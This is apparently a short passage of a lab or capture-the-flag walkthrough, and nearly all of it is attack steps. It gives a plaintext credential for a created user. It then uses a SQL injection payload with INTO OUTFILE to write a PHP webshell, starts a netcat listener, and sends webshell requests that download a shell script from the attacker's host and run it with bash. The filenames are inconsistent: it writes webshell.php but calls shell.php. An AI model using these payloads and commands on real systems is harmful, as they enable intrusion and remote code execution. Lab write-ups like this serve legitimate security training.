17445

Registering and creating a new user and logging in as issue_user : ManagementInsideOld797

Now we can write the webshell to the path discovered from port [[30455]]

' union select '<?php system($_GET["cmd"]); ?>' into outfile '/srv/http/webshell.php' -- -
python3 -m http.server 30455

Setup a listener:

sudo rlwrap nc -nlvp 443

Then:

http://192.168.155.147:30455/shell.php?cmd=wget http://192.168.45.182/shell.sh
http://192.168.155.147:30455/shell.php?cmd=bash%20shell.sh

Last updated